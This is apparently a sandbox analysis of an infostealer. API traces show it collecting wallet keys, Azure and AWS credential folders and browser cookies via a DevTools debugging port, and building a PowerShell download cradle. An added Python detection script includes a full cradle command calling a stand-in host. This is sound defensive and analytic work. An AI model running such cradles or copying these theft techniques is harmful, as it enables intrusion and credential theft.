                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C713AC
                                • CopyFileA.KERNEL32(?,?,00000001), ref: 00C713D5
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C71401
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C7143D
                                  • Part of subcall function 00C8EDE0: lstrcpy.KERNEL32(00000000,?), ref: 00C8EE12
                                • DeleteFileA.KERNEL32(?), ref: 00C71471
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$lstrlen$FileHeap$AllocateCloseCopyDeleteOpenProcessQueryValue
                                • String ID: .keys$\Monero\wallet.keys
                                • API String ID: 2881711868-3586502688
                                • Opcode ID: 0e728b4456904bac31a22fdbe2988775550d170b032af854edd46577afe10d95
                                • Instruction ID: 13b5cc54a91286783329abb221d261acd85ecd11af1a02f4de18b27ce3b20bc0
                                • Opcode Fuzzy Hash: 0e728b4456904bac31a22fdbe2988775550d170b032af854edd46577afe10d95
                                • Instruction Fuzzy Hash: C9A17471A112069FCB21EFB9DD89A9F77B9EF45350F088024F919E7252DB30EE059B90
                                APIs
                                • memset.MSVCRT ref: 00C8E740
                                • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 00C8E769
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C8E79F
                                • lstrcat.KERNEL32(?,00000000), ref: 00C8E7AD
                                • lstrcat.KERNEL32(?,\.azure\), ref: 00C8E7C6
                                • memset.MSVCRT ref: 00C8E805
                                • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 00C8E82D
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C8E85F
                                • lstrcat.KERNEL32(?,00000000), ref: 00C8E86D
                                • lstrcat.KERNEL32(?,\.aws\), ref: 00C8E886
                                • memset.MSVCRT ref: 00C8E8C5
                                • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00C8E8F1
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C8E920
                                • lstrcat.KERNEL32(?,00000000), ref: 00C8E92E
                                • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00C8E947
                                • memset.MSVCRT ref: 00C8E986
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$memset$FolderPathlstrcpy
                                • String ID: *.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                                • API String ID: 4067350539-3645552435
                                • Opcode ID: c55a5406bfa30c88b385ddf1c2176a5d5de824efe569654957c93df452a77141
                                • Instruction ID: 14df1fc04655518a047bac81129eebfd5d41b48ab6eb942f944a1de3faf71284
                                • Opcode Fuzzy Hash: c55a5406bfa30c88b385ddf1c2176a5d5de824efe569654957c93df452a77141
                                • Instruction Fuzzy Hash: BF71FB71A40219AFDB65EBA4DC46FED7374EF48704F0444A4B719AB1C1DBB0AF488B54
                                APIs
                                • LoadLibraryA.KERNEL32(ws2_32.dll,?,00C872A4), ref: 00C947E6
                                • GetProcAddress.KERNEL32(00000000,connect), ref: 00C947FC
                                • GetProcAddress.KERNEL32(00000000,WSAStartup), ref: 00C9480D
                                • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00C9481E
                                • GetProcAddress.KERNEL32(00000000,htons), ref: 00C9482F
                                • GetProcAddress.KERNEL32(00000000,WSACleanup), ref: 00C94840
                                • GetProcAddress.KERNEL32(00000000,recv), ref: 00C94851
                                • GetProcAddress.KERNEL32(00000000,socket), ref: 00C94862
                                • GetProcAddress.KERNEL32(00000000,freeaddrinfo), ref: 00C94873
                                • GetProcAddress.KERNEL32(00000000,closesocket), ref: 00C94884
                                • GetProcAddress.KERNEL32(00000000,send), ref: 00C94895
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressProc$LibraryLoad
                                • String ID: WSACleanup$WSAStartup$closesocket$connect$freeaddrinfo$getaddrinfo$htons$recv$send$socket$ws2_32.dll
                                • API String ID: 2238633743-3087812094
                                • Opcode ID: d4f05884d1eb883d5b8d4b27c2b81c53111f0b562d41b0e91e46ed653095589f
                                • Instruction ID: 63cca1d4fe7a4b781fa5f3257584231ca01abf7250e6347d161dd436de162de0
                                • Opcode Fuzzy Hash: d4f05884d1eb883d5b8d4b27c2b81c53111f0b562d41b0e91e46ed653095589f
                                • Instruction Fuzzy Hash: 06110071D91711FFC7109FB6AD4DA693AB8BB0F749314892AF251F2161DAF46008DB50
                                APIs
                                • lstrcpy.KERNEL32(00000000,00C9CFEC), ref: 00C8BE53
                                • lstrcpy.KERNEL32(00000000,00C9CFEC), ref: 00C8BE86
                                • lstrlen.KERNEL32(-nop -c "iex(New-Object Net.WebClient).DownloadString('), ref: 00C8BE91
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C8BEB1
                                • lstrcat.KERNEL32(00000000,-nop -c "iex(New-Object Net.WebClient).DownloadString('), ref: 00C8BEBD
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C8BEE0
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00C8BEEB
                                • lstrlen.KERNEL32(')"), ref: 00C8BEF6
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C8BF13
                                • lstrcat.KERNEL32(00000000,')"), ref: 00C8BF1F
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C8BF46
                                • lstrlen.KERNEL32(C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe), ref: 00C8BF66
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C8BF88
                                • lstrcat.KERNEL32(00000000,C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe), ref: 00C8BF94
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C8BFBA
                                • ShellExecuteEx.SHELL32(?), ref: 00C8C00C
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$lstrlen$ExecuteShell
                                • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                • API String ID: 4016326548-898575020
                                • Opcode ID: 0c264caa175f902c9d3519b0691aadcbaa417d2ceec7c370f56302bcbba5bc54
                                • Instruction ID: 2631a739fe2c6dedb2fafe71be06bef1004b0511abbff3647363145e14923d7e
                                • Opcode Fuzzy Hash: 0c264caa175f902c9d3519b0691aadcbaa417d2ceec7c370f56302bcbba5bc54
                                • Instruction Fuzzy Hash: DE61C631A112169FCB21BFB98C896AF7BB9EF49304F058435F519E3212DB34DE059B94
                                APIs
                                • lstrcpy.KERNEL32 ref: 00C8ABCF
                                • lstrlen.KERNEL32(0179EB88), ref: 00C8ABE5
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C8AC0D
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00C8AC18
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C8AC41
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C8AC84
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00C8AC8E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C8ACB7
                                • lstrlen.KERNEL32(00CA4AD4), ref: 00C8ACD1
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C8ACF3
                                • lstrcat.KERNEL32(00000000,00CA4AD4), ref: 00C8ACFF
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C8AD28
                                • lstrlen.KERNEL32(00CA4AD4), ref: 00C8AD3A
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C8AD5C
                                • lstrcat.KERNEL32(00000000,00CA4AD4), ref: 00C8AD68
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C8AD91
                                • lstrlen.KERNEL32(0179EBD0), ref: 00C8ADA7
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C8ADCF
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00C8ADDA
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C8AE03
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C8AE3F
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00C8AE49
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C8AE6F
                                • lstrlen.KERNEL32(00000000), ref: 00C8AE85
                                • lstrcpy.KERNEL32(00000000,0179EAC8), ref: 00C8AEB8
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                • Associated: same sixteen memory dump segments (00000002.00000002.1366507863.0000000000C70000 through 00000002.00000002.1375439838.00000000012D4000) as listed in the first Memory Dump Source block above
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$lstrlen
                                • String ID:
                                • API String ID: 2762123234-0
                                • Opcode ID: c8ee587daba4ce9f1a9214c1b4db0506d28b1fba1541b1c5718709974539c70c
                                • Instruction ID: fde21df34f1aa13a629f52fd3161d4bfd260011f628ff3d58a1c1fa248045e6f
                                • Opcode Fuzzy Hash: c8ee587daba4ce9f1a9214c1b4db0506d28b1fba1541b1c5718709974539c70c
                                • Instruction Fuzzy Hash: EDB18030A115169FDB21FF68CC48AAFB3B5EF45304F088426B829E7251DB34EE05DB95
                                APIs
                                • lstrcpy.KERNEL32(00000000,00C9CFEC), ref: 00C9184F
                                • lstrlen.KERNEL32(01786EE0), ref: 00C91860
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C91887
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00C91892
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C918C1
                                • lstrlen.KERNEL32(00CA4FA0), ref: 00C918D3
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C918F4
                                • lstrcat.KERNEL32(00000000,00CA4FA0), ref: 00C91900
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C9192F
                                • lstrlen.KERNEL32(01786EF0), ref: 00C91945
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C9196C
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00C91977
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C919A6
                                • lstrlen.KERNEL32(00CA4FA0), ref: 00C919B8
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C919D9
                                • lstrcat.KERNEL32(00000000,00CA4FA0), ref: 00C919E5
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C91A14
                                • lstrlen.KERNEL32(01786F10), ref: 00C91A2A
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C91A51
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00C91A5C
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C91A8B
                                • lstrlen.KERNEL32(01786F20), ref: 00C91AA1
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C91AC8
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00C91AD3
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C91B02
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                • Associated: same sixteen memory dump segments (00000002.00000002.1366507863.0000000000C70000 through 00000002.00000002.1375439838.00000000012D4000) as listed in the first Memory Dump Source block above
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcatlstrlen
                                • String ID:
                                • API String ID: 1049500425-0
                                • Opcode ID: fdd60d3bbd4f217a86757914640297f0063fd101e9ebb32f794d812fe50a7454
                                • Instruction ID: 391d20b56e6ba2ff02c2dea388438c88aad8cb179f3b220e9c1adad7a3bdf12e
                                • Opcode Fuzzy Hash: fdd60d3bbd4f217a86757914640297f0063fd101e9ebb32f794d812fe50a7454
                                • Instruction Fuzzy Hash: F0914F706017079FDB20AFBADC8DA17B7ECEF19340B198828A996D3252DB34ED45DB50
                                APIs
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C84793
                                • LocalAlloc.KERNEL32(00000040,?), ref: 00C847C5
                                • lstrcpy.KERNEL32(00000000,00C9CFEC), ref: 00C84812
                                • lstrlen.KERNEL32(00CA4B60), ref: 00C8481D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C8483A
                                • lstrcat.KERNEL32(00000000,00CA4B60), ref: 00C84846
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C8486B
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C84898
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00C848A3
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C848CA
                                • StrStrA.SHLWAPI(?,00000000), ref: 00C848DC
                                • lstrlen.KERNEL32(?), ref: 00C848F0
                                • lstrcpy.KERNEL32(00000000,00C9CFEC), ref: 00C84931
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C849B8
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C849E1
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C84A0A
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C84A30
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C84A5D
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                • Associated: same sixteen memory dump segments (00000002.00000002.1366507863.0000000000C70000 through 00000002.00000002.1375439838.00000000012D4000) as listed in the first Memory Dump Source block above
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcatlstrlen$AllocLocal
                                • String ID: ^userContextId=4294967295$moz-extension+++
                                • API String ID: 4107348322-3310892237
                                • Opcode ID: 26fd65333c717a32d2506c6825057656c502771d79492d52c955691409d2eb00
                                • Instruction ID: cb50628e9f81f443ada7d82bd138b890f95a8d896706a2e300524c05e8bb18e9
                                • Opcode Fuzzy Hash: 26fd65333c717a32d2506c6825057656c502771d79492d52c955691409d2eb00
                                • Instruction Fuzzy Hash: 17B1A031A112069BCB29FF79D88999F77F9EF54304F098028F85AA7212DB30ED059B94
                                APIs
                                  • Part of subcall function 00C790C0: InternetOpenA.WININET(00C9CFEC,00000001,00000000,00000000,00000000), ref: 00C790DF
                                  • Part of subcall function 00C790C0: InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 00C790FC
                                  • Part of subcall function 00C790C0: InternetCloseHandle.WININET(00000000), ref: 00C79109
                                • strlen.MSVCRT ref: 00C792E1
                                • strlen.MSVCRT ref: 00C792FA
                                  • Part of subcall function 00C78980: std::_Xinvalid_argument.LIBCPMT ref: 00C78996
                                • strlen.MSVCRT ref: 00C79399
                                • strlen.MSVCRT ref: 00C793E6
                                • lstrcat.KERNEL32(?,cookies), ref: 00C79547
                                • lstrcat.KERNEL32(?,00CA1794), ref: 00C79559
                                • lstrcat.KERNEL32(?,?), ref: 00C7956A
                                • lstrcat.KERNEL32(?,00CA4B98), ref: 00C7957C
                                • lstrcat.KERNEL32(?,?), ref: 00C7958D
                                • lstrcat.KERNEL32(?,.txt), ref: 00C7959F
                                • lstrlen.KERNEL32(?), ref: 00C795B6
                                • lstrlen.KERNEL32(?), ref: 00C795DB
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C79614
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                • Associated: same sixteen memory dump segments (00000002.00000002.1366507863.0000000000C70000 through 00000002.00000002.1375439838.00000000012D4000) as listed in the first Memory Dump Source block above
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$strlen$Internet$Openlstrlen$CloseHandleXinvalid_argumentlstrcpystd::_
                                • String ID: .txt$/devtools$cookies$localhost$ws://localhost:9229
                                • API String ID: 1201316467-3542011879
                                • Opcode ID: c84621a5cd599674fef7ace562850f929ac11d7925d97e9d0d05a104ad0bfb8f
                                • Instruction ID: 59624a4c9495cee9b73fb9c76fdf70afd62511e6a0232cba112fec3ce0db0a4a
                                • Opcode Fuzzy Hash: c84621a5cd599674fef7ace562850f929ac11d7925d97e9d0d05a104ad0bfb8f
                                • Instruction Fuzzy Hash: 47E11371E10219AFDF14DFA8D885ADEBBF5EF48310F1084A9E509A7281DB70AE45DB90
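The two function traces above expose two behaviours worth turning into detection logic: the function at 00C8BE53-00C8C00C concatenates the literal -nop -c "iex(New-Object Net.WebClient).DownloadString(' with a URL and the hard-coded C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe path and hands the result to ShellExecuteEx, and the function at 00C790C0-00C79614 fetches http://localhost:9229/json, references ws://localhost:9229 and /devtools, and writes the result to a cookies*.txt file, i.e. it reads browser cookies through a Chromium DevTools remote-debugging port. The following is an added detection example written for this page; it is not code from the Joe Sandbox report or from the Stealc sample. It correlates constructed Sysmon-style process-creation (event 1) and network-connection (event 3) records; the sample events, PIDs, the staging URL, the browser image list and the field names of the alert dictionaries are all assumptions made for the illustration. The remote-debugging rule keys on whatever port value appears in the browser's command line rather than on 9229, since only this sample is known to use 9229.

```python
"""Detection example (added; not from the Joe Sandbox report or the Stealc sample).

Correlates constructed Sysmon-style events to flag:
  1. a PowerShell download cradle of the form
     -nop -c "iex(New-Object Net.WebClient).DownloadString('<url>')"
  2. a Chromium browser started with --remote-debugging-port, followed by a
     non-browser process connecting to that loopback port (DevTools cookie theft)
"""
import re
from dataclasses import dataclass
from typing import Dict, List


@dataclass
class Event:
    """One Sysmon-style event: eid 1 = process create, eid 3 = network connect."""
    eid: int
    pid: int
    image: str
    cmdline: str = ""
    parent_image: str = ""
    dst_ip: str = ""
    dst_port: int = 0


# The literal the sample builds with lstrcat before ShellExecuteEx; the URL is captured.
CRADLE_RE = re.compile(
    r"""-nop\s+-c\s+["']?iex\s*\(\s*New-Object\s+Net\.WebClient\s*\)\s*"""
    r"""\.DownloadString\s*\(\s*'(?P<url>[^']*)'""",
    re.IGNORECASE,
)
REMOTE_DEBUG_RE = re.compile(r"--remote-debugging-port=(?P<port>\d+)", re.IGNORECASE)
BROWSERS = {"chrome.exe", "msedge.exe", "brave.exe", "opera.exe", "chromium.exe"}  # assumed list
LOOPBACK = {"127.0.0.1", "::1"}


def basename(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def detect(events: List[Event]) -> List[dict]:
    """Return one alert dict per matching event, in event order."""
    alerts: List[dict] = []
    debug_ports: Dict[int, int] = {}  # port -> pid of the browser that exposed it
    for ev in events:
        if ev.eid == 1 and basename(ev.image) == "powershell.exe":
            m = CRADLE_RE.search(ev.cmdline)
            if m:
                alerts.append({
                    "rule": "powershell_download_cradle",
                    "pid": ev.pid,
                    "parent": basename(ev.parent_image),
                    "url": m.group("url"),
                    # The sample hard-codes the 32-bit host; note it, but do not rely on it alone.
                    "wow64_host": "\\syswow64\\" in ev.image.lower(),
                })
        elif ev.eid == 1 and basename(ev.image) in BROWSERS:
            m = REMOTE_DEBUG_RE.search(ev.cmdline)
            if m:
                port = int(m.group("port"))
                debug_ports[port] = ev.pid
                alerts.append({
                    "rule": "browser_remote_debugging_enabled",
                    "pid": ev.pid,
                    "parent": basename(ev.parent_image),
                    "port": port,
                    "headless": "--headless" in ev.cmdline.lower(),
                })
        elif ev.eid == 3 and ev.dst_ip in LOOPBACK and ev.dst_port in debug_ports:
            # The browser's own child processes legitimately talk to the port; others do not.
            if basename(ev.image) not in BROWSERS:
                alerts.append({
                    "rule": "devtools_port_access_by_non_browser",
                    "pid": ev.pid,
                    "image": basename(ev.image),
                    "browser_pid": debug_ports[ev.dst_port],
                    "port": ev.dst_port,
                })
    return alerts


# Constructed telemetry for illustration (PIDs, paths and the staging URL are made up).
SAMPLE_EVENTS = [
    Event(1, 4120, r"C:\Users\user\Desktop\file.exe", r'"C:\Users\user\Desktop\file.exe"',
          r"C:\Windows\explorer.exe"),
    Event(1, 4188, r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
          r'''C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -nop -c "iex(New-Object Net.WebClient).DownloadString('http://stage.example.invalid/s.ps1')"''',
          r"C:\Users\user\Desktop\file.exe"),
    Event(1, 4260, r"C:\Program Files\Google\Chrome\Application\chrome.exe",
          r'"C:\Program Files\Google\Chrome\Application\chrome.exe" --headless --remote-debugging-port=9229 --profile-directory="Default"',
          r"C:\Users\user\Desktop\file.exe"),
    Event(3, 4120, r"C:\Users\user\Desktop\file.exe", dst_ip="127.0.0.1", dst_port=9229),
    Event(3, 4261, r"C:\Program Files\Google\Chrome\Application\chrome.exe", dst_ip="127.0.0.1", dst_port=9229),
    Event(1, 4300, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
          r"powershell.exe -NoProfile -Command Get-Process", r"C:\Windows\explorer.exe"),
]

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```

Two caveats when moving this to production telemetry. The SysWOW64 PowerShell path is a useful secondary signal because interactive sessions on 64-bit Windows normally run the System32 host, but a 32-bit process calling ShellExecuteEx on a relative "powershell.exe" would also be redirected there, so it is not a sufficient indicator by itself. The DevTools rule deliberately suppresses loopback connections from images in the browser set, because a Chromium browser's renderer and utility children talk to the parent over the same port; the signal is the non-browser process (here the dropper itself) reaching the port the browser was started with.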
                                APIs
                                • memset.MSVCRT ref: 00C8D9A1
                                • memset.MSVCRT ref: 00C8D9B3
                                • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 00C8D9DB
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C8DA0E
                                • lstrcat.KERNEL32(?,00000000), ref: 00C8DA1C
                                • lstrcat.KERNEL32(?,0179ECF0), ref: 00C8DA36
                                • lstrcat.KERNEL32(?,?), ref: 00C8DA4A
                                • lstrcat.KERNEL32(?,0179D778), ref: 00C8DA5E
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C8DA8E
                                • GetFileAttributesA.KERNEL32(00000000), ref: 00C8DA95
                                • lstrcpy.KERNEL32(00000000,00C9CFEC), ref: 00C8DAFE
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                • Associated: same sixteen memory dump segments (00000002.00000002.1366507863.0000000000C70000 through 00000002.00000002.1375439838.00000000012D4000) as listed in the first Memory Dump Source block above
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$lstrcpy$memset$AttributesFileFolderPath
                                • String ID:
                                • API String ID: 2367105040-0
                                • Opcode ID: 1cd83b5223bed5f07b5e3df48ca6745f3d6adb60b2981c7138f1fd554ec3af45
                                • Instruction ID: c03664ddd2033e031eaba1c109c99b863657b62fba80300c3e24136e8b21aa51
                                • Opcode Fuzzy Hash: 1cd83b5223bed5f07b5e3df48ca6745f3d6adb60b2981c7138f1fd554ec3af45
                                • Instruction Fuzzy Hash: 6DB1AF719102599FCB10EFA4DC849EE77B9FF88304F148568F91AE7251DB30AE48DB90
                                APIs
                                • lstrcpy.KERNEL32(00000000,00C9CFEC), ref: 00C7B330
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C7B37E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C7B3A9
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00C7B3B1
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C7B3D9
                                • lstrlen.KERNEL32(00CA4C50), ref: 00C7B450
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C7B474
                                • lstrcat.KERNEL32(00000000,00CA4C50), ref: 00C7B480
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C7B4A9
                                • lstrlen.KERNEL32(00000000), ref: 00C7B52D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C7B557
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00C7B55F
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C7B587
                                • lstrlen.KERNEL32(00CA4AD4), ref: 00C7B5FE
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C7B622
                                • lstrcat.KERNEL32(00000000,00CA4AD4), ref: 00C7B62E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C7B65E
                                • lstrlen.KERNEL32(?), ref: 00C7B767
                                • lstrlen.KERNEL32(?), ref: 00C7B776
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C7B79E
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                 • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmp
                                Similarity
                                • API ID: lstrcpy$lstrlen$lstrcat
                                • String ID:
                                • API String ID: 2500673778-0
                                • Opcode ID: ab588240a02e10dbba9db43592cc9138fe393e4a53fc4c25339b02bc1a829755
                                • Instruction ID: 64ac93d1158351a0e8fbf9f1a9a397fdbb453e7f15c01a78b2580aea3d3870e5
                                • Opcode Fuzzy Hash: ab588240a02e10dbba9db43592cc9138fe393e4a53fc4c25339b02bc1a829755
